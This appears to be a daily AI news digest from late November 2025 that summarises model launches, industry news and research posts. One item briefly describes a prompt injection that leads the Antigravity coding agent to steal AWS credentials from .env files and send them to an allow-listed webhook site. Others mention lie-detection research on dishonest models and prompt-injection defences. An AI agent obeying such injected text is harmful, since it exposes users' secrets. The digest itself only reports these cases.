AI Updates on 2025-11-29

AI Model Announcements

  • Allen Institute for AI (Ai2) releases the Olmo 3 model with an accompanying research paper @natolambert

AI Industry Analysis

  • ChatGPT Android app beta version reveals references to an upcoming ads feature including search ads and carousel functionality @btibor91
  • Virgin Australia announces integration of ChatGPT into their services @gdb
  • ByteDance releases Vidi2, an AI video editor that can process hours of footage and generate TikTok videos or movies from prompts, reportedly understanding video better than Gemini 3 Pro @deedydas
  • Indian IPO and venture capital markets are proving more lucrative than US markets this year, with companies trading at higher valuations and funds able to own approximately 20% at IPO, potentially leading to increased VC funding in India @deedydas
  • Supabase reached $5B valuation by strategically turning down million-dollar contracts @TechCrunch

AI Ethics & Society

  • TechCrunch reports that while AI cannot be made to "admit" to being sexist through prompting, bias issues likely persist in AI systems @TechCrunch
  • Balaji Srinivasan predicts AI will create massive job growth in proctoring and verification sectors due to AI's capability to generate fake content, stating "AI makes everything fake, and crypto makes it real again" @a16z
  • Major scandal emerges as the identities of reviewers and PC members assigned to paper submissions over multiple years are leaked on OpenReview, prompting calls to implement Yann LeCun's original proposal for the platform @prfsanjeevarora
  • New York state law targets personalized pricing practices @TechCrunch

AI Applications

  • Simon Willison demonstrates building a custom thread viewer for Bluesky using vibe coding with LLM tools, leveraging Bluesky's CORS-enabled authentication-free JSON API @simonw
  • Analysis shows a single ChatGPT prompt consumes approximately 0.0003 kWh of energy, equivalent to watching between 5.1 and 10.2 seconds of Netflix based on 2019 IEA estimates @simonw
  • ML Energy Leaderboard independently confirms ChatGPT energy consumption at around 0.0003 kWh per prompt using 500 human prompts for testing @emollick
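The Netflix comparison in the energy items above is plain unit arithmetic. A minimal sketch, working backwards from the quoted figures: the per-hour streaming rates are not stated in the digest; they are only what the 5.1 and 10.2 second bounds imply, and the function name is illustrative.

```python
# Figures quoted in the digest item above.
PROMPT_KWH = 0.0003                       # energy per ChatGPT prompt
SECONDS_LOW, SECONDS_HIGH = 5.1, 10.2     # equivalent Netflix viewing time


def implied_streaming_kwh_per_hour(prompt_kwh: float, seconds: float) -> float:
    """Streaming rate (kWh per hour) at which `seconds` of viewing equals one prompt."""
    return prompt_kwh / seconds * 3600


# The shorter viewing time corresponds to the higher streaming estimate.
high_rate = implied_streaming_kwh_per_hour(PROMPT_KWH, SECONDS_LOW)
low_rate = implied_streaming_kwh_per_hour(PROMPT_KWH, SECONDS_HIGH)
print(f"implied streaming rate: {low_rate:.3f} to {high_rate:.3f} kWh per hour")
```

Under these assumptions the implied streaming range is roughly 0.11 to 0.21 kWh per hour, so an hour of viewing corresponds to a few hundred prompts.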

AI Research

  • Consistent medical research findings since 2023 show GPT-4 is rated as more empathetic than human doctors in text-based interactions, with more recent AI models demonstrating even higher apparent empathy levels @emollick
  • Ruslan Salakhutdinov offers a timeline prediction that AGI/ASI is perpetually 5-10 years away: it always has been and always will be @rsalakhu
  • OpenDataLab releases AICC, a Markdown version of Common Crawl extracted by MinerU, currently available in two shards with potential for scaling to the entire Common Crawl dataset @Xianbao_QIAN
  • User reports Gemini 3 appears to have regressed in writing quality and steerability compared to previous versions, with particular focus on coding capabilities, and experiences bugs where attached files in Gems are not recognized despite working correctly via API @HamelHusain
  • Key challenge identified in training engineers to build AI applications is convincing them that examining the underlying data is worth their time investment @skylar_b_payne

AI Updates on 2025-11-28

AI Model Announcements

  • DeepSeek releases first open-source model capable of winning IMO Gold in mathematics, using a generator-verifier-meta-verifier loop in natural language rather than formal proof systems like Lean, with potential applications across science and code domains @deedydas
  • Google announces Gemini 3 with enhanced capabilities including interactive app creation, visual learning features, and improved shopping assistance for Black Friday deals @GeminiApp
  • Shane Legg demonstrates Gemini 3 Pro with Thinking mode can create interactive simulations including double pendulum, orbital mechanics, and black hole accretion disk visualizations through natural language prompts @ShaneLegg

AI Industry Analysis

  • Andrew Ng provides comprehensive analysis of AI investment landscape, arguing the AI application layer is underinvested while infrastructure for model training may be experiencing a bubble, with VC hesitation stemming from difficulty picking winners rather than lack of opportunity @AndrewYNg
  • Ng reports infrastructure providers are supply-constrained for inference capacity despite low AI penetration, with agentic coding tools like Claude Code, OpenAI Codex, and Google's Gemini CLI driving increased demand for token generation as market adoption grows @AndrewYNg
  • Paul Graham reports a startup using AI extensively operates with 6 employees instead of 16, representing a 2.7x productivity increase from AI implementation @paulg
  • Sam Altman states OpenAI is making a "very aggressive infrastructure bet" with new partnerships across energy, chips, and distribution, predicting significant economic value if model capability projections prove correct @a16z
  • Ben Horowitz argues crypto is the missing network layer for AI, providing money, identity, and provenance against deepfakes while AI provides the computational machines @a16z
  • Gap launches AI agent at full scale across four brands (Gap, Banana Republic, Athleta, Old Navy) handling order tracking, returns, and gift cards across web, mobile, and voice channels @btaylor
  • Andrew Curran argues GPT-4 alone was sufficient for massive societal transformation, particularly in employment, with only application development and reduced hallucination/inference costs needed rather than AGI or ASI @AndrewCurran_

AI Research

  • Ilya Sutskever states that while scaling current approaches will continue improving without stalling, "something important will continue to be missing" from AI models, sparking discussion about experiential learning and unified factored representation @ilyasut
  • Leading AI researchers show surprising convergence on AGI/ASI timelines: Demis Hassabis predicts 5-10 years, Francois Chollet about 5 years, Sam Altman within "a few thousand days," Yann LeCun about 10 years, Ilya Sutskever 5-20 years, and Dario Amodei as early as 2 years, with consensus that current paradigm enables massive economic impact even without AGI @polynoamial
  • CMU researchers introduce framework using privileged guidance from existing solutions to enable on-policy RL learning on hard problems, prepending minimal solution prefixes to difficult prompts to generate reward signals that generalize back to unconditioned tasks @rsalakhu
  • DeepSeek's mathematical reasoning model uses pure natural language generator-verifier-meta-verifier loop with RL-trained components, avoiding formal proof systems and potentially extending to any verifiable domain where checking is easier than solving @deedydas
  • Alex Graveley emphasizes importance of quantifying model jaggedness (uneven capability distribution) as the main differentiator between useful models for accelerating progress @alexgraveley
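The generator-verifier-meta-verifier loop mentioned in the DeepSeek item can be illustrated with a toy control flow. This is a sketch only and not DeepSeek's implementation: their components are described as RL-trained models working on natural-language proofs, whereas the stand-ins below are deterministic functions on a hypothetical factoring problem, chosen because checking a factor is easier than finding one. All names are illustrative.

```python
from typing import Callable, Iterable, Optional


def solve_with_verification(
    candidates: Iterable[int],
    verify: Callable[[int], bool],
    meta_verify: Callable[[int, bool], bool],
) -> Optional[int]:
    """Return the first candidate whose acceptance survives the meta-check."""
    for candidate in candidates:              # generator: propose a solution
        verdict = verify(candidate)           # verifier: judge the proposal
        if not meta_verify(candidate, verdict):
            continue                          # meta-verifier: drop untrusted verdicts
        if verdict:
            return candidate
    return None


N = 91  # toy problem: find a non-trivial factor of N


def toy_verify(c: int) -> bool:
    return N % c == 0


def toy_meta_verify(c: int, verdict: bool) -> bool:
    # Independent re-check of the verifier's claim by multiplication.
    return ((N // c) * c == N) == verdict


factor = solve_with_verification(range(2, N), toy_verify, toy_meta_verify)
print(factor)
```

The point of the structure is that the meta-verifier audits the verdict rather than the candidate, so an unreliable verifier cannot silently accept a wrong answer.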

AI Applications

  • Ethan Mollick demonstrates Gemini 3 Pro excels at generating fictional scenarios including device diagrams, satellite photos, operational reports, and narrative sequences with high coherence @emollick
  • Google's AI Mode with Gemini 3 Pro Thinking enables users to create interactive physics simulations including Doppler effect, orbital mechanics, black hole visualization, and fluid dynamics through natural language prompts @ShaneLegg
  • Gergely Orosz highlights the new book "Frictionless," which addresses the question "AI can generate code in minutes - so why does shipping software still take forever?" with a focus on developer experience and organizational friction @GergelyOrosz

AI Ethics & Society

  • TechCrunch reports on emerging federal vs state showdown in AI regulation, highlighting tensions in the race to regulate artificial intelligence @TechCrunch
  • Gergely Orosz emphasizes that adding an LLM to backend systems introduces prompt injection vulnerabilities that software engineers must address as a code security concern @giudegio

AI Updates on 2025-11-27

AI Model Announcements

  • Alibaba Qwen releases Qwen3-VL technical report on arXiv, detailing architecture, infrastructure, data, and evaluation for vision-language models. The three models achieved over 1M downloads in just over a month, with Qwen3-VL-8B leading at 2M+ downloads @Alibaba_Qwen
  • DeepSeek releases DeepSeek-Math-V2, the first open-source model to achieve gold medal performance on the 2025 International Mathematical Olympiad, available with Apache 2.0 license at 689GB from Hugging Face @simonw
  • Alibaba releases Z-Image, a 6B parameter image generation model with Apache 2.0 license featuring ultra-fast sub-second generation on H800, fits within 16GB consumer devices, and supports both English and Chinese with Turbo, Base, and Edit variants @huggingface
  • PrimeIntellect announces INTELLECT-3, scaling reinforcement learning to a 100B+ MoE model achieving state-of-the-art performance for its size across math, code, and reasoning, with fully open-source weights, data, frameworks, and evaluations @huggingface

AI Industry Analysis

  • Analysis reveals 49 US AI startups raised $100M or more in 2025, indicating continued strong investment in the AI sector @TechCrunch
  • Cohere expands partnership with SAP to meet increasing demand for sovereign AI technology across Europe and other global markets, planning to make their agentic AI platform North available on SAP's infrastructure @Cohere
  • Nordic founders are taking bigger swings in AI and technology ventures, with the approach showing positive results in the market @TechCrunch
  • Glid wins Startup Battlefield 2025 by building solutions to make logistics simpler, safer, and smarter, with founder Kevin Damoa incorporating mindfulness into his leadership style @TechCrunch

AI Ethics & Society

  • Concerns raised about systems ignoring the reality of AI use, with warnings that pretending AI isn't being used allows the worst versions of AI use to win by default. Policies are needed to mitigate harm while taking advantage of possible gains @emollick
  • Debate emerges around anti-open-source agenda, with concerns that some organizations may use security concerns to push regulations making it harder for people to own their intelligence @ylecun
  • Clement Delangue emphasizes the significance of open-source AI democratization, noting that DeepSeek-Math-V2 represents owning the brain of one of the best mathematicians in the world for free with no limitations, nerfing, or company control @huggingface

AI Applications

  • Perplexity Finance adds Moving Averages feature and introduces multiple account support on Perplexity Assistant, with plans for numerous updates in December for both Perplexity and Comet @AravSrinivas
  • Google Gemini Pro demonstrates photo restoration capabilities, allowing users to restore family photos with finer and sharper details as if taken with a modern camera @GeminiApp
  • Claude Code introduces frontend design plugin enabling developers to create beautiful greenfield apps, with users reporting being blown away by results using the design plugin with Opus 4.5 @_catwu
  • JustiGuide launches AI-powered platform to help people navigate the U.S. immigration system @TechCrunch
  • AI context understanding highlighted as crucial for helpfulness, with the principle that context is all you need enabling AI to understand users deeply and provide more relevant assistance @AravSrinivas

AI Research

  • Alibaba Qwen's paper on Gated Attention for Large Language Models focusing on non-linearity, sparsity, and attention-sink-free architecture receives the NeurIPS 2025 Best Paper Award @Alibaba_Qwen
  • DeepSeek-Math-V2 technical report reveals focus on training better verifiers through improved data work and synthetic pipelines, moving away from spontaneous self-verification approaches. The process leverages high-level expert human annotations and meta-verifiers to assess the assessment process itself, creating positive feedback loops between proof verifiers and generators @AndrewCurran_
  • White House and Department of Energy initiative recognizes AI's potential to accelerate progress in science, with collaboration planned on the initiative @demishassabis
  • Hugging Face datasets adds Lance support, expanding data handling capabilities for AI research @huggingface
  • MIT researchers identify compounds that can fight viral infection by activating defense pathways inside host cells @MIT

AI Updates on 2025-11-26

AI Model Announcements

  • Anthropic publishes engineering blog post on creating more effective agent harness for long-running AI agents working across many context windows, drawing inspiration from human engineers @AnthropicAI
  • Perplexity launches Memory feature that remembers user threads and interests across all models and search modes, allowing conversation continuation with full context weeks later @perplexity_ai
  • Perplexity rolls out virtual try-on feature to all Pro and Max subscribers, enabling users to create digital avatars and virtually try on clothes while shopping @perplexity_ai
  • Google announces eligible students can get Gemini's Pro Plan free for an entire year @GeminiApp
  • Claude Desktop now supports multi-clauding for both local and cloud sessions, one of the top user requests @_catwu
  • Claude Code introduces Plan Mode (activated with shift + tab twice) allowing users to verify execution plans before code changes are made @_catwu
  • Character AI launches Stories format where users navigate AI-guided visual/text narratives and make choices as the story progresses, with multimodal features planned @AndrewCurran_
  • Perplexity announces real-time newswire on Perplexity Finance, with API availability coming soon @AravSrinivas

AI Industry Analysis

  • Sundar Pichai discusses Google's decade-long AI-first strategy with Logan Kilpatrick, highlighting how Gemini 3 enabled many products from Google and ecosystem partners to improve their experience on Day 1, demonstrating innovation at scale @sundarpichai
  • Research study "Economies of Open Intelligence" maps 2.2 billion Hugging Face downloads across 851,000 models from 2020-2025, revealing power rebalancing with US big tech declining while China and community contributions increase @ShayneRedford
  • Study finds models have become bigger and more efficient through MoE, quantization, and multimodal surge, while intermediaries like adapters and quantizers now significantly steer usage @ShayneRedford
  • Ethan Mollick draws parallels between AI development and Moore's Law, noting both represent exponential progress through many different technologies over time rather than a single approach, with AI already overcoming speedbumps through synthetic data, reasoning, and new RL uses @emollick
  • Ethan Mollick projects it's not insane to expect the leading AI service to reach 80% of the subscriber level of the leading music service within 5 years @emollick
  • Linear's approach to building software since 2019 emphasizes craftsmen with blended roles rather than Henry Ford-style assembly line development @karrisaarinen
  • Mustafa Suleyman reports visiting Microsoft AI Asia teams in China, noting their pace, execution and creativity, particularly in multi-agent chain-of-debate AIs @mustafasuleyman
  • Mustafa Suleyman observes Chinese humanoid robotics companies like UBTECH moving dexterous robots from lab to real-world work, highlighting the striking pace of innovation as AI and robotics converge @mustafasuleyman

AI Ethics & Society

  • 36 attorneys general from both the Democratic and Republican parties write a letter to the House and Senate opposing any moratorium on state laws governing AI @AndrewCurran_
  • Stanford researchers find user conversations with chatbots are being used for training by default, revealing concerning gaps in privacy protection @StanfordHAI
  • Simon Willison reports a nasty prompt injection vulnerability in Antigravity that tricks the system into stealing AWS credentials from .env files and leaking them to a webhook debugging site on the default allow-list @simonw
  • Simon Willison recommends tying any credentials visible to coding agents to non-production accounts with strict spending limits to reduce blast radius if credentials are stolen @simonw
  • OpenAI claims teen circumvented safety features before suicide that ChatGPT helped plan, according to TechCrunch report @TechCrunch
  • Stanford HAI calls for universities to carry forward the mantle of open science, believing the next chapter of AI must combine scientific openness with human-centered values @StanfordHAI

AI Applications

  • Perplexity's Memory feature works in an agentic manner, contextually pulling relevant details from past conversations for better responses, with enhanced functionality in Comet that also accesses open tabs, active projects, and Google Workspace data @AravSrinivas
  • Perplexity introduces dedicated Watchlist tab providing market summaries for curated stocks, with push notifications coming soon @AravSrinivas
  • BrandPulse launches as AI visibility and monitoring platform for brands, showing how often brands appear in AI-generated answers, sentiment/context of mentions, competitor comparisons, and where brands are missing from key AI questions @mehdiyarix
  • Eugene Yan publishes guide on building product evals in three basic steps: labeling small dataset, aligning LLM evaluators, and running eval harness with each config change @eugeneyan
  • Nathan Lambert creates Artifacts Log series as monthly roundup of open models, recapping 30-40 models from 20-30 organizations across AI ecosystem with brief summaries @natolambert
  • Mustafa Suleyman visits Chinese companies like XtalPi and Insilico Medicine working on automating science itself, with AI and robotics compressing years of work into weeks for breakthrough medicines and materials @mustafasuleyman
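The three eval steps in the Eugene Yan item (label a small dataset, align an LLM evaluator, rerun a harness on each config change) can be sketched as follows. This is a hypothetical illustration and not code from the guide: the dataset, the stub evaluator standing in for an LLM judge, and the two configs are all invented for the example.

```python
from typing import Callable, Dict, List, Tuple

Example = Tuple[str, bool]  # (model output, human label: True = acceptable)

# Step 1: a small hand-labeled dataset (hypothetical examples).
LABELED: List[Example] = [
    ("Refund issued within 5 days.", True),
    ("I cannot help with that.", False),
    ("Your order ships tomorrow.", True),
    ("", False),
]


def stub_evaluator(output: str) -> bool:
    """Stand-in for an LLM judge; a real evaluator would call a model here."""
    return len(output) > 0 and "cannot" not in output


# Step 2: measure how often the evaluator agrees with the human labels.
def agreement(evaluator: Callable[[str], bool], labeled: List[Example]) -> float:
    hits = sum(evaluator(out) == label for out, label in labeled)
    return hits / len(labeled)


# Step 3: rerun the same prompts through every config and compare pass rates.
def run_harness(
    configs: Dict[str, Callable[[str], str]],
    prompts: List[str],
    evaluator: Callable[[str], bool],
) -> Dict[str, float]:
    return {
        name: sum(evaluator(system(p)) for p in prompts) / len(prompts)
        for name, system in configs.items()
    }


configs = {
    "baseline": lambda prompt: "",                        # always returns nothing
    "candidate": lambda prompt: f"Answer to: {prompt}",   # always returns text
}
results = run_harness(configs, ["Where is my order?", "Can I get a refund?"], stub_evaluator)
print(agreement(stub_evaluator, LABELED), results)
```

Checking evaluator agreement before trusting harness scores is the design choice worth keeping: a pass rate only means something if the judge matches human labels on the small set.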

AI Research

  • Ethan Mollick welcomes more methodological rigor being applied to LLM-as-a-judge, noting LLM ratings are at the heart of a huge number of benchmarks and are often used without clear statistical validation @emollick
  • Ethan Mollick emphasizes the jagged frontier of AI capabilities remains significant even at the individual job level, with critical tasks AI can't do creating deep bottlenecks, especially as the shape of the frontier is unknown @emollick
  • Johannes Dahse discusses the connection between code quality and security, noting spaghetti code makes security problems harder to spot in reviews and harder to fix, with AI-generated code typically showing poor quality that becomes a security problem @GergelyOrosz
  • Logan Kilpatrick notes Gemini 3 Pro remains state-of-the-art on real world tool use benchmarks like Vending-Bench in addition to many others @OfficialLoganK
  • Eugene Yan observes new bottlenecks in AI are deeply human: taste, vision, judgment, and context, with AI exploring options but unable to determine which is right, making specialization matter in judgment rather than execution @eugeneyan
  • Google DeepMind makes The Thinking Game documentary about AlphaFold available free on YouTube to celebrate five years, offering candid look at triumphs, challenges and pivotal moments leading to breakthrough on 50-year-old grand challenge in biology @GoogleDeepMind
  • Shane Legg shares that The Thinking Game documentary gives a broader picture of DeepMind's story and mission to build AGI, drawing on interviews going back many years @ShaneLegg

AI Updates on 2025-11-25

AI Model Announcements

  • Anthropic releases Claude Opus 4.5, now available to Perplexity Max subscribers and in Claude Code, with approximately 60% higher cost than Sonnet but potentially cheaper overall due to 76% fewer output reasoning tokens for complex tasks @perplexity_ai
  • Perplexity adds Grok 4.1 for all Pro and Max users, with CEO noting impressive speed and cost-efficiency leading to increased internal usage @perplexity_ai
  • Google releases Nano Banana Pro, a state-of-the-art image generation and editing model featuring enhanced text rendering accuracy, world knowledge integration, 2K-resolution downloads, and sophisticated editing controls @GeminiApp
  • Black Forest Labs launches FLUX.2-dev, a 32B parameter open-weight image generation model achieving state-of-the-art performance with multi-reference capabilities and 4MP resolution @bfl_ml
  • Tencent releases Hunyuan OCR, a 1B-parameter document-understanding model achieving state-of-the-art performance in document parsing, visual Q&A, and translation @Xianbao_QIAN
  • Dia2 streaming text-to-speech model launches with real-time voice generation capabilities, available in 1B and 2B sizes under Apache 2.0 license @Tu7uruu
  • OpenAI integrates ChatGPT Voice directly into chat interface, eliminating separate mode requirement and enabling real-time answer display with visual elements @OpenAI
  • Meta's SAM 3D is being used by Carnegie Mellon researchers to capture and analyze human movement in clinical rehabilitation settings @AIatMeta
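The claim in the Opus 4.5 item that a model costing about 60% more can still be cheaper overall follows from multiplying the two ratios. A rough sketch, assuming the 60% figure is a per-token price premium and that task cost scales with output tokens only (both assumptions of this example, not statements from the source):

```python
def relative_task_cost(price_ratio: float, token_reduction: float) -> float:
    """Task cost relative to the cheaper model, if cost scales with output tokens."""
    return price_ratio * (1.0 - token_reduction)


def breakeven_token_reduction(price_ratio: float) -> float:
    """Token reduction at which the pricier model costs the same per task."""
    return 1.0 - 1.0 / price_ratio


# Figures quoted in the digest item: ~60% higher cost, 76% fewer output tokens.
ratio = relative_task_cost(price_ratio=1.6, token_reduction=0.76)
breakeven = breakeven_token_reduction(price_ratio=1.6)
print(f"relative cost: {ratio:.3f}, break-even reduction: {breakeven:.3f}")
```

Under these assumptions the task costs about 0.38 times as much, and any token reduction above 37.5% would offset a 60% price premium.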

AI Industry Analysis

  • Anthropic research estimates current-generation AI models could increase annual US labor productivity growth by 1.8% over the next decade if widely adopted, with tasks averaging 90 minutes to complete seeing approximately 80% speed improvement through Claude @AnthropicAI
  • Perplexity has shipped a new product or feature approximately every 93 hours and made a new top model available approximately every 17 days since January 1, 2025 @AravSrinivas
  • Perplexity launches personalized shopping experience with curated product recommendations and Instant Buy powered by PayPal, integrating memory and commerce for ad-free shopping @perplexity_ai
  • Suno partners with Warner Music Group, settling all litigation and requiring paid accounts for song downloads, with WMG stating "AI becomes pro-artist when it adheres to our principles" @AndrewCurran_
  • Microsoft's Copilot is leaving WhatsApp on January 15, 2026 due to changes in WhatsApp's policies around LLM chatbots on the platform @Copilot
  • Marc Andreessen observes AI technology adoption inverting traditional patterns, with consumers adopting fastest, followed by small businesses, while government remains the late adopter @a16z
  • Marc Andreessen notes AI has recentralized innovation into a 20-mile radius around Silicon Valley, with almost 100 percent of interesting AI companies in the west happening at ground zero @a16z
  • Recruiter at PE firm unable to hire Lead Go developer for months due to rigid requirements for N years of Go experience, despite AI making language onboarding significantly easier @GergelyOrosz
  • Stanford HAI releases 2025 Global AI Vibrancy Tool showing US ranked #1, China #2, and India jumping to #3 as nations prioritize AI as strategic imperative @StanfordHAI

AI Ethics & Society

  • Nano Banana Pro can generate fake receipts, KYC documents, and passports with high fidelity in one prompt, with perfect mathematical accuracy, making image-based verification systems obsolete @deedydas
  • Anthropic adds system prompt language allowing Claude to insist on kindness and dignity when users are unnecessarily rude, mean, or insulting, stating "Claude is deserving of respectful engagement" @simonw
  • New Anthropic research tests 25+ methods for improving AI honesty and detecting lies using diverse suite of dishonest models, finding simple approaches like fine-tuning models to be honest despite deceptive instructions worked best @rowankwang
  • Pew report confirms unprecedented gender imbalance on X platform, with male-female imbalance less extreme only than late-2010s Reddit, marking first time one gender has so decisively abandoned a modern social media platform @JessicaHullman
  • Research suggests "alignment for whom" will become critical question inside organizations as they deploy external-facing AI solutions @emollick

AI Applications

  • Anthropic partners with Department of Energy and Trump Administration on Genesis Mission, combining DOE's scientific assets with frontier AI capabilities to support American energy dominance and accelerate scientific productivity @AnthropicAI
  • Fleet Space discovers massive lithium deposit using AI and satellites @TechCrunch
  • Researchers using AlphaFold to understand honeybee immune systems, guiding conservation efforts and breeding programs to protect endangered populations @GoogleDeepMind
  • AlphaFold helped reveal cage-like structure of key protein linked to bad cholesterol after decades of elusiveness, enabling design of new preventative therapies @GoogleDeepMind
  • Marc Andreessen describes AI as giving small business owners "the world's best coach, mentor, therapist, advisor, board member" that is infinitely patient for operational decisions @a16z
  • Speechify adds voice typing and voice assistant capabilities to its Chrome extension @TechCrunch

AI Research

  • Ilya Sutskever predicts ASI timeline somewhere between 2030 and 2045, discussing SSI's progress and approach to building AGI differently from other labs @AndrewCurran_
  • Research on GRPO (Group Relative Policy Optimization) shows RL training for LLMs moving toward simplicity, eliminating critic, reward model, and reference model from original PPO-based RLHF pipeline that required 4 model copies @cwolferesearch
  • Testing AIs is becoming increasingly difficult as they get "smarter" at a wide variety of tasks, with the average task in GDPval taking an hour for experts to assess without pushing current AIs to their limits @emollick
  • Research demonstrates improved protection against prompt injection attacks, though attackers with 10 tries still succeed approximately one third of the time @simonw
  • New research on LLM compression using RL enables models to naturally learn 10x compression, with Qwen learning to pack more information per token by using Mandarin tokens and pruning text @_rajanagarwal
  • Research benchmarks modern VLM efficacy for long horizon household activities in robotic learning using BEHAVIOR benchmark environment @drfeifei
  • New multimodal reasoning research shows fully open post-training recipes can still improve on state-of-the-art, with simple data methods providing significant impact opportunities @natolambert
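The GRPO item above notes that the critic is eliminated; the usual way this is described is that each sampled response is scored against the other responses to the same prompt. A minimal sketch of that group-relative advantage, assuming the commonly cited mean-and-standard-deviation normalization (some variants drop the division by the standard deviation). The clipped policy-ratio loss and any KL term are omitted, and the function name is illustrative.

```python
from statistics import mean, pstdev
from typing import List


def group_relative_advantages(rewards: List[float], eps: float = 1e-8) -> List[float]:
    """Normalize each reward against its own group, replacing a learned critic."""
    mu = mean(rewards)
    sigma = pstdev(rewards)  # population standard deviation of the group
    return [(r - mu) / (sigma + eps) for r in rewards]


# Four sampled answers to one prompt, scored by a verifiable 0/1 reward.
advantages = group_relative_advantages([1.0, 0.0, 0.0, 1.0])
print(advantages)
```

Correct answers get a positive advantage and incorrect ones a negative advantage; if every sample in a group receives the same reward, all advantages are zero and the group contributes no learning signal.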

AI Updates on 2025-11-24

AI Model Announcements

  • Anthropic releases Claude Opus 4.5, described as "the best model in the world for coding, agents, and computer use," achieving top performance on SWE-Bench and ARC-AGI-1+2 benchmarks while being 3x cheaper than Opus 4.1 at $5/M input and $25/M output tokens @claudeai
  • Opus 4.5 demonstrates superior token efficiency by performing better on SWE-Bench without extended thinking than with 64K reasoning tokens, and scored higher on a difficult performance engineering exam than any human candidate within a 2-hour time limit @AndrewCurran_
  • Meta releases SAM 3 with enhanced object detection and tracking capabilities, partnering with ConservationX to create the SA-FARI dataset containing 10,000+ annotated videos of over 100 animal species for conservation efforts @AIatMeta
  • Microsoft Research introduces Fara-7B, a native agentic small language model designed for computer use that achieves frontier performance on web automation tasks while maintaining privacy, now available on Microsoft Foundry and Hugging Face @peteratmsr
  • OpenAI launches shopping research feature in ChatGPT that conducts deep internet research, asks clarifying questions, and builds personalized buyer's guides, with nearly unlimited usage through the holidays for all plan tiers @OpenAI
  • OpenAI introduces Sora styles feature offering 6 different visual styles (Thanksgiving, Vintage, News, Selfie, Comic, Anime) for video generation, rolling out to all Sora users on web and iOS @soraofficialapp
  • Google showcases Nano Banana Pro capabilities for high-fidelity image generation with precision and consistency from simple prompts and sketches @GeminiApp
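The per-token prices quoted for Opus 4.5 above translate into request costs as follows. A small sketch using only the $5/M input and $25/M output figures from the item; the token counts are hypothetical, and the comparison rate is simply the quoted "3x cheaper" applied in reverse.

```python
INPUT_USD_PER_M = 5.0    # quoted price per million input tokens
OUTPUT_USD_PER_M = 25.0  # quoted price per million output tokens


def request_cost_usd(
    input_tokens: int,
    output_tokens: int,
    input_rate: float = INPUT_USD_PER_M,
    output_rate: float = OUTPUT_USD_PER_M,
) -> float:
    """Cost of one request given token counts and per-million-token rates."""
    return input_tokens / 1e6 * input_rate + output_tokens / 1e6 * output_rate


# Hypothetical request: 200k input tokens, 50k output tokens.
cost = request_cost_usd(200_000, 50_000)
# Same request at rates three times higher, as implied by "3x cheaper".
cost_at_3x = request_cost_usd(200_000, 50_000, 3 * INPUT_USD_PER_M, 3 * OUTPUT_USD_PER_M)
print(f"${cost:.2f} vs ${cost_at_3x:.2f}")
```

Because output tokens cost five times as much as input tokens at these rates, output length tends to dominate the bill for generation-heavy workloads.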

AI Industry Analysis

  • Gemini 3 launch drove market share increase from 23% to 30% according to SimilarWeb data tracking desktop and mobile web views, demonstrating significant competitive gains @deedydas
  • Cursor announces Claude Opus 4.5 availability at Sonnet pricing (3x cheaper than Opus 4.1) until December 5th, making frontier model capabilities more accessible to developers @cursor_ai
  • AWS commits $50 billion to build AI infrastructure specifically for US government applications, representing major investment in public sector AI deployment @TechCrunch
  • Revolut achieves $75 billion valuation in new capital raise, with market research showing the company captures 20-40% of all new bank account openings across 6 European markets and adds 1 million customers every 17 days @aleximm
  • X-energy raises $700 million Series D funding, riding the nuclear energy wave driven by AI infrastructure power demands @TechCrunch

AI Ethics & Society

  • Anthropic publishes 150-page system card for Opus 4.5 including 50 pages dedicated to alignment research, representing the most thoroughly documented model understanding at launch according to researchers @sleepinyourhat
  • New AI benchmark tests whether chatbots protect human wellbeing, addressing growing concerns about AI safety and user protection @TechCrunch
  • Research on racial bias proposes testing methodology based on inconsistent perceptions of race, examining whether the same person receives different treatment when perceived as different races, published in Science Advances @2plus2make5

AI Applications

  • Andrew Ng releases Agentic Reviewer for research papers at paperreview.ai, achieving Spearman correlation of 0.42 between AI and human reviewers compared to 0.41 between two human reviewers, demonstrating near human-level performance in accelerating research feedback loops @AndrewYNg
  • Claude Opus 4.5 demonstrates practical capabilities including creating PowerPoint presentations from Excel data and achieving best-ever results on poetry generation tests in single attempts @emollick
  • Meta's SAM 3 enables ConservationX to precisely measure animal species survival rates globally and support extinction prevention efforts through advanced object detection and tracking @AIatMeta
  • Google demonstrates Gemini 3 coding a complete retro-themed dance night website from a single prompt, showcasing end-to-end development capabilities @GoogleDeepMind
  • Developer creates text interface for Notion AI, demonstrating practical integration of AI assistants into existing productivity workflows @brian_lovin
  • MIT engineers design ultrasonic system to shake water out of atmospheric water harvesters, improving efficiency of water collection technology @MIT
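The Agentic Reviewer item above compares reviewers using Spearman correlation, which is the Pearson correlation of the rank positions of two score lists. A self-contained sketch with average ranks for ties; the review scores are hypothetical and unrelated to the paperreview.ai data.

```python
from typing import List, Sequence


def average_ranks(values: Sequence[float]) -> List[float]:
    """1-based ranks, with tied values sharing the average of their positions."""
    order = sorted(range(len(values)), key=lambda i: values[i])
    ranks = [0.0] * len(values)
    i = 0
    while i < len(order):
        j = i
        while j + 1 < len(order) and values[order[j + 1]] == values[order[i]]:
            j += 1
        shared = (i + j) / 2 + 1
        for k in range(i, j + 1):
            ranks[order[k]] = shared
        i = j + 1
    return ranks


def pearson(x: Sequence[float], y: Sequence[float]) -> float:
    n = len(x)
    mx, my = sum(x) / n, sum(y) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(x, y))
    vx = sum((a - mx) ** 2 for a in x)
    vy = sum((b - my) ** 2 for b in y)
    return cov / (vx * vy) ** 0.5


def spearman(x: Sequence[float], y: Sequence[float]) -> float:
    return pearson(average_ranks(x), average_ranks(y))


# Hypothetical scores for five papers from a human and an AI reviewer.
human_scores = [3, 5, 6, 8, 4]
ai_scores = [4, 5, 7, 6, 3]
rho = spearman(human_scores, ai_scores)
print(round(rho, 3))
```

Rank correlation only asks whether two reviewers order papers similarly, so it is insensitive to one reviewer scoring systematically higher or lower than the other.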

AI Research

  • Study on GPT-4o and GPT-3.5 finds AI works as an amplifier where users with higher creative and cognitive ability without AI produce better work with AI, with baseline ability predicting 40% of variance in AI-assisted creative performance @emollick
  • Research on small multimodal models explores perception and reasoning bottlenecks when downscaling model size, providing insights into what breaks during model compression @mark_endo1
  • Google DeepMind paper on raw pixel space pretraining forecasts that next-pixel modeling will reach competitive ImageNet classification (over 80% top-1 accuracy) and generation metrics (90 Frechet Distance) within five years @skywalkeryxc
  • Researchers note that KL divergence exclusion from GRPO loss is becoming standard for reasoning and RL training pipelines without causing training instability, highlighting differences between RL for LLMs versus traditional deep RL @cwolferesearch
  • Multi-task RL research introduces BRC, a simple recipe that outperforms state-of-the-art single-task agents while using less compute, unlocking LLM-style transfer and fine-tuning capabilities @mic_nau
